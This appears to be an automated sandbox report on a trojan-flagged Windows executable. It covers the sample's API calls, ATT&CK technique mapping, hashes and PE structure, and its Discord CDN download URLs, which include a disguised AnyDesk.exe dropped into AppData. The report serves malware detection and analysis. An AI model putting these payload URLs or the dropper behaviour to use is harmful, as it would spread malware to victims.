Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_00000001400693D0 GetComputerNameW,GetUserNameW,

0_2_00000001400693D0

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Code function: 0_2_00000001400CF0C4 HeapCreate,GetVersion,HeapSetInformation,

0_2_00000001400CF0C4

Source: Amcache.hve.0.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: MsMpEng.exe

Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	Binary or memory string: WIN_XP
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	Binary or memory string: ?A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingle\AutoHotkey.exeWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003%04hX0x%IxpPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32W-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkpcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfop6
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	Binary or memory string: WIN_VISTA
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	Binary or memory string: WIN_7
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	Binary or memory string: WIN_8
Source: SecuriteInfo.com.FileRepMalware.14270.3068.exe	Binary or memory string: WIN_8.1

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014001E980 Shell_NotifyIconW,RemoveClipboardFormatListener,ChangeClipboardChain,DestroyWindow,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,free,free,free,	0_2_000000014001E980
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_000000014001F410 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,	0_2_000000014001F410
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe	Code function: 0_2_0000000140073910 RemoveClipboardFormatListener,ChangeClipboardChain,	0_2_0000000140073910

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	21 Input Capture	11 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Process Injection	1 DLL Side-Loading	NTDS	14 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	141 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Process Injection	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.FileRepMalware.14270.3068.exe	14%	ReversingLabs	Win64.Trojan.Nekark
SecuriteInfo.com.FileRepMalware.14270.3068.exe	46%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
https://autohotkey.comCould	0%	URL Reputation	safe
https://autohotkey.comCould	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.133.233	true	false		high

Contacted URLs

Name	Malicious	Reputation
https://cdn.discordapp.com/attachments/946434985617944649/1187449788539613234/AnyDesk.exe?ex=6596edcb&is=658478cb&hm=1ccb90ac0e74e5fc5ff101f4716703308a02fb42540256a74e81a4d808fbe4ef&	false	high
https://cdn.discordapp.com/attachments/946434985617944649/1187447469185974412/2img.png?ex=6596eba2&is=658476a2&hm=ceac553c8fa20a5a29d3a30fafcd5022ef44d33396c849d1a84b29a8507c87e5&	false	high
https://cdn.discordapp.com/attachments/946434985617944649/1187447469743804447/1img.png?ex=6596eba2&is=658476a2&hm=0a3291a0428a9a3a412cccb212e697c45efde312d3ae0a17818b7bba37eb978d&	false	high
https://cdn.discordapp.com/attachments/946434985617944649/1187447469492150292/3img.png?ex=6596eba2&is=658476a2&hm=e54785c353dcbe635c35016ed6a0babbb34588ac67d1176df058c308ee2bef44&	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cdn.discordapp.com/attachments/946434985617944649/1187447469492150292/3img.png?ex=6596eba2&i	SecuriteInfo.com.FileRepMalware.14270.3068.exe	false		high
http://upx.sf.net	Amcache.hve.0.dr	false		high
https://cdn.discordapp.com/attachments/946434985617944649/1187447469743804447/1img.png?ex=6596eba2&i	SecuriteInfo.com.FileRepMalware.14270.3068.exe	false		high
https://cdn.discordapp.com/	SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000003.2082580723.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.14270.3068.exe, 00000000.00000002.3328171326.0000000000951000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.discordapp.com/attachments/946434985617944649/1187447469185974412/2img.png?ex=6596eba2&i	SecuriteInfo.com.FileRepMalware.14270.3068.exe	false		high
https://autohotkey.com	SecuriteInfo.com.FileRepMalware.14270.3068.exe	false		high
https://cdn.discordapp.com/attachments/946434985617944649/1187449788539613234/AnyDesk.exe?ex=6596edc	SecuriteInfo.com.FileRepMalware.14270.3068.exe	false		high
https://autohotkey.comCould	SecuriteInfo.com.FileRepMalware.14270.3068.exe	false	URL Reputation: safe URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.159.133.233	cdn.discordapp.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1417368
Start date and time:	2024-03-29 05:20:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.FileRepMalware.14270.3068.exe
Detection:	MAL
Classification:	mal56.evad.winEXE@3/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 217 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:20:59	API Interceptor	1x Sleep call for process: SecuriteInfo.com.FileRepMalware.14270.3068.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.159.133.233	Cheat_Lab_2.7.2.msi	Get hash	malicious	LummaC Stealer	Browse	cdn.discordapp.com/attachments/1175030470057136169/1175030979925135361/9
	Cheat.Lab.2.7.1.msi	Get hash	malicious	RedLine	Browse	cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
	Cheat.Lab.2.7.1.msi	Get hash	malicious	RedLine	Browse	cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
	DHL_SHIPMENTS.exe	Get hash	malicious	AsyncRAT, FormBook	Browse	cdn.discordapp.com/attachments/1012640888754819173/1012643262537928734/DHL_SHIPMENTS_Olorqccl.bmp
	SecuriteInfo.com.W32.FakeDoc.CY.genEldorado.18918.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	cdn.discordapp.com/attachments/956928735397965906/1006148111393116200/yXfZJqhIAtCWEPINOAX189.thn
	64AE5410F978DF0F48DCC67508820EA230C566967E002.exe	Get hash	malicious	DCRat	Browse	cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
	PO - Drawings And Specifications Sheet_pdf.scr.exe	Get hash	malicious	AveMaria	Browse	cdn.discordapp.com/attachments/472051232014598144/935778066171580456/Sjddks44.jpg
	BFSdrqaAvS.exe	Get hash	malicious	Amadey RedLine	Browse	cdn.discordapp.com/attachments/878034206570209333/908436663947124756/slhost.exe
	GR01DtRd0N.exe	Get hash	malicious	Vidar	Browse	cdn.discordapp.com/attachments/575791168713916457/896907138390192158/ETH2.exe
	update[1].exe	Get hash	malicious	Unknown	Browse	cdn.discordapp.com/attachments/870656611562180611/873962758427783228/4401fbad77d12fbc.dll

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cdn.discordapp.com	http://www.cyclic.sh/pricing	Get hash	malicious	HTMLPhisher	Browse	162.159.130.233
	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	162.159.130.233
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	162.159.129.233
	SecuriteInfo.com.Win64.CrypterX-gen.24907.17990.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	162.159.135.233
	SecuriteInfo.com.Trojan.DownLoader32.59441.8119.31619.exe	Get hash	malicious	Unknown	Browse	162.159.135.233
	SecuriteInfo.com.Trojan.DownLoader32.59441.8119.31619.exe	Get hash	malicious	Unknown	Browse	162.159.135.233
	vHpxL6E2sQ.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	162.159.129.233
	Tdkdsxz.exe	Get hash	malicious	Unknown	Browse	162.159.135.233
	Mtkfarukc.exe	Get hash	malicious	Unknown	Browse	162.159.133.233
	Cvdnacb.exe	Get hash	malicious	Unknown	Browse	162.159.130.233

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://1drv.ms/f/s!AsWd4BQz7qwJa8oeifBH2QA-eNg	Get hash	malicious	HTMLPhisher	Browse	172.67.131.219
	https://jpn104.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-22952	Get hash	malicious	TechSupportScam	Browse	172.67.208.186
	https://jpn104.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-24980	Get hash	malicious	TechSupportScam	Browse	104.21.53.38
	https://jpn104-secondary.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-25074	Get hash	malicious	TechSupportScam	Browse	104.21.53.38
	https://jpn104-secondary.z23.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-24910	Get hash	malicious	TechSupportScam	Browse	172.67.208.186
	https://depl.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	162.247.243.29
	https://attwebupdate.w3spaces.com/	Get hash	malicious	Unknown	Browse	172.67.8.174
	https://8e1fd3fcd03b297a.pages.dev/robots.txt	Get hash	malicious	HTMLPhisher	Browse	104.18.24.163
	https://sdf37.z12.web.core.windows.net/werrx01USAHTML/?bcda=1-855-314-9082	Get hash	malicious	TechSupportScam	Browse	172.67.208.186
	https://oom21.z1.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-88868-22952	Get hash	malicious	TechSupportScam	Browse	172.67.208.186

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Vidar	Browse	162.159.133.233
	dVX6r5CyYY.exe	Get hash	malicious	GuLoader	Browse	162.159.133.233
	assento 555 pro-Model-2.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	162.159.133.233
	awb_shipping_doc_23642.vbs	Get hash	malicious	FormBook, GuLoader	Browse	162.159.133.233
	TOMBIG - 9004898 - Ponuka#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	162.159.133.233
	ocrev ns.ordine 290520280324.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	162.159.133.233
	lista de cotizaciones del catalogo#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	162.159.133.233
	CANKO DMC IMPORT ENQUIRY.PDF.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	162.159.133.233
	Transaction Advice_280324-WS-394-1247.vbe	Get hash	malicious	AgentTesla, GuLoader	Browse	162.159.133.233
	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	162.159.133.233

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.8537006129630296
Encrypted:	false
SSDEEP:	3:hGQRALjVLeJKuWJu:hCVLWqu
MD5:	A1CA4BEBCD03FAFBE2B06A46A694E29A
SHA1:	FFC88125007C23FF6711147A12F9BBA9C3D197ED
SHA-256:	C3FA59901D56CE8A95A303B22FD119CB94ABF4F43C4F6D60A81FD78B7D00FA65
SHA-512:	6FE1730BF2A6BBA058C5E1EF309A69079A6ACCA45C0DBCA4E7D79C877257AC08E460AF741459D1E335197CF4DE209F2A2997816F2A2A3868B2C8D086EF789B0E
Malicious:	false
Reputation:	low
Preview:	This content is no longer available.

C:\Users\user\AppData\Roaming\Microsoft\Windows\2img.png

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.8537006129630296
Encrypted:	false
SSDEEP:	3:hGQRALjVLeJKuWJu:hCVLWqu
MD5:	A1CA4BEBCD03FAFBE2B06A46A694E29A
SHA1:	FFC88125007C23FF6711147A12F9BBA9C3D197ED
SHA-256:	C3FA59901D56CE8A95A303B22FD119CB94ABF4F43C4F6D60A81FD78B7D00FA65
SHA-512:	6FE1730BF2A6BBA058C5E1EF309A69079A6ACCA45C0DBCA4E7D79C877257AC08E460AF741459D1E335197CF4DE209F2A2997816F2A2A3868B2C8D086EF789B0E
Malicious:	false
Reputation:	low
Preview:	This content is no longer available.

C:\Users\user\AppData\Roaming\Microsoft\Windows\3img.png

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.8537006129630296
Encrypted:	false
SSDEEP:	3:hGQRALjVLeJKuWJu:hCVLWqu
MD5:	A1CA4BEBCD03FAFBE2B06A46A694E29A
SHA1:	FFC88125007C23FF6711147A12F9BBA9C3D197ED
SHA-256:	C3FA59901D56CE8A95A303B22FD119CB94ABF4F43C4F6D60A81FD78B7D00FA65
SHA-512:	6FE1730BF2A6BBA058C5E1EF309A69079A6ACCA45C0DBCA4E7D79C877257AC08E460AF741459D1E335197CF4DE209F2A2997816F2A2A3868B2C8D086EF789B0E
Malicious:	false
Reputation:	low
Preview:	This content is no longer available.

C:\Users\user\AppData\Roaming\Microsoft\Windows\AnyDesk.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.8537006129630296
Encrypted:	false
SSDEEP:	3:hGQRALjVLeJKuWJu:hCVLWqu
MD5:	A1CA4BEBCD03FAFBE2B06A46A694E29A
SHA1:	FFC88125007C23FF6711147A12F9BBA9C3D197ED
SHA-256:	C3FA59901D56CE8A95A303B22FD119CB94ABF4F43C4F6D60A81FD78B7D00FA65
SHA-512:	6FE1730BF2A6BBA058C5E1EF309A69079A6ACCA45C0DBCA4E7D79C877257AC08E460AF741459D1E335197CF4DE209F2A2997816F2A2A3868B2C8D086EF789B0E
Malicious:	false
Reputation:	low
Preview:	This content is no longer available.

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465912815677086
Encrypted:	false
SSDEEP:	6144:8zZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:CZHtBZWOKnMM6bFpZj4
MD5:	2868578CC8CF8ED9771C63580BAE5FC5
SHA1:	35EA3A9F2BA3AA1E383A5194F56DE6F68F3A19B3
SHA-256:	8F60B93856DBB24B22D5F8FCB46ED71F262486762E697E10046B91F233582132
SHA-512:	B3DCF644C2DDF2F884C2ADF4ABFF452509A2B3D3A9C452B2FB530C121BC352B48DB738171E89D8857A5D0A6875B8B64AEEFC48E9436AB52C40269E0043F5FDBC
Malicious:	false
Reputation:	low
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmf6..................................................................................................................................................................................................................................................................................................................................................P-..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.395936475465321
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.FileRepMalware.14270.3068.exe
File size:	1'277'440 bytes
MD5:	dfbaf344699830430ae052254168d580
SHA1:	de616823f575b133c413bd497d30f8b19e71dce6
SHA256:	51b0a985ab920e9f898b89bb10d3c5f6382179b046f3882a5697c1e2d8c88ba6
SHA512:	1181d0076995a5b66fdf53368f4124d79877a4169ebf08bcfd3d5d7339f4a44d34b6372ce5dbc5ac67adee072b48a8f0b33fc568516618114802a8b3a0e89d4e
SSDEEP:	24576:MdofGAmSIQ177wZ+A7MjiiRDXU/Sat5RgsLSmIOHsU5zMmX1xYwncqKvGqs2:MdofGbSIQ177wZvYjiiRDXASat5RgsL+
TLSH:	05456C072391C0F4DF67E0B2CB26923AD6B5B41007289EDB55A0991EEF93ED05E3E752
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........C...C...C...XTX.v...XTY.....J.p.D...J.t.B...J.`.^...C.......XTm.T...XT\.h...XTi.B...XTn.B...RichC...........PE..d...v..d...

File Icon


Icon Hash:	9c1ed7912d2d3d0f

Static PE Info

General

Entrypoint:	0x1400cdb10
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:
Time Stamp:	0x64A8F376 [Sat Jul 8 05:26:14 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	a649e6750bcf2911044dec744c57f40f

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FA33CACA82Ch
dec eax
add esp, 28h
jmp 00007FA33CAC4077h
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], esi
push edi
dec eax
sub esp, 20h
dec eax
lea ebx, dword ptr [ecx+1Ch]
dec eax
mov ebp, ecx
mov esi, 00000101h
dec eax
mov ecx, ebx
inc esp
mov eax, esi
xor edx, edx
call 00007FA33CAC6E84h
inc ebp
xor ebx, ebx
dec eax
lea edi, dword ptr [ebp+10h]
inc ecx
lea ecx, dword ptr [ebx+06h]
inc ecx
movzx eax, bx
inc esp
mov dword ptr [ebp+0Ch], ebx
dec esp
mov dword ptr [ebp+04h], ebx
rep stosw
dec eax
lea edi, dword ptr [0004450Eh]
dec eax
sub edi, ebp
mov al, byte ptr [edi+ebx]
mov byte ptr [ebx], al
dec eax
inc ebx
dec eax
dec esi
jne 00007FA33CAC4215h
dec eax
lea ecx, dword ptr [ebp+0000011Dh]
mov edx, 00000100h
mov al, byte ptr [ecx+edi]
mov byte ptr [ecx], al
dec eax
inc ecx
dec eax
dec edx
jne 00007FA33CAC4215h
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov ebp, dword ptr [esp+38h]
dec eax
mov esi, dword ptr [esp+40h]
dec eax
add esp, 20h
pop edi
ret
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+10h], ebx
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
push ebp
dec eax
lea ebp, dword ptr [eax-00000488h]
dec eax
sub esp, 00000580h
dec eax
mov eax, dword ptr [000452BBh]
dec eax
xor eax, esp

Rich Headers

Programming Language:

[C++] VS2010 SP1 build 40219
[ C ] VS2010 SP1 build 40219
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10e37c	0x12c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x131000	0x11f7c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x11f000	0x7a58	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe0000	0xeb8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xde3c6	0xde400	1ba31dfbebc502f73fc1f1b9acfe88f6	False	0.5378201015888638	data	6.546634342198407	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xe0000	0x312de	0x31400	e44e67b79d5c560cd4370a176f824868	False	0.2806303537436548	data	4.969705518008835	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x112000	0xc3b8	0x5000	6b771dc1ff7332df436cc3b4bab43284	False	0.249560546875	data	3.309109498410039	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x11f000	0x7a58	0x7c00	7ad34a269fdb90eb2e3104d81b1922fb	False	0.4772555443548387	data	5.986236702358392	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
text	0x127000	0x258d	0x2600	c2225e974b892ae6322728534b6587c5	False	0.4644325657894737	data	5.770018591122181	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE
data	0x12a000	0x6ec0	0x7000	8f4275b626558a8640120f611553e570	False	0.47119140625	data	6.457359279664662	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x131000	0x11f7c	0x12000	a688b42c760c98614d8c073daf44af4c	False	0.13850911458333334	data	3.9414219876204286	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1313f8	0xfa18	Device independent bitmap graphic, 120 x 258 x 32, image size 61920	English	United States	0.08687367237286017
RT_ICON	0x140e10	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6941489361702128
RT_ICON	0x141278	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6622340425531915
RT_ICON	0x1416e0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6453900709219859
RT_ICON	0x141b48	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.6655405405405406
RT_MENU	0x141c70	0x2c8	data	English	United States	0.46207865168539325
RT_DIALOG	0x141f38	0xe8	data	English	United States	0.6206896551724138
RT_ACCELERATOR	0x142020	0x48	data	English	United States	0.8194444444444444
RT_RCDATA	0x142068	0x79f	ASCII text	English	United States	0.3531522296258329
RT_GROUP_ICON	0x142808	0x14	data	English	United States	1.15
RT_GROUP_ICON	0x14281c	0x14	data	English	United States	1.25
RT_GROUP_ICON	0x142830	0x14	data	English	United States	1.25
RT_GROUP_ICON	0x142844	0x14	data	English	United States	1.25
RT_GROUP_ICON	0x142858	0x14	data	English	United States	1.25
RT_VERSION	0x14286c	0x21c	data	English	United States	0.49074074074074076
RT_MANIFEST	0x142a88	0x4f4	ASCII text, with very long lines (1268), with no line terminators	English	United States	0.4755520504731861

Imports

DLL	Import
WSOCK32.dll	gethostbyname, inet_addr, WSACleanup, gethostname, WSAStartup
WINMM.dll	mixerGetLineInfoW, mixerGetDevCapsW, mixerOpen, mciSendStringW, joyGetPosEx, mixerGetLineControlsW, mixerGetControlDetailsW, mixerSetControlDetails, waveOutGetVolume, mixerClose, waveOutSetVolume, joyGetDevCapsW
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
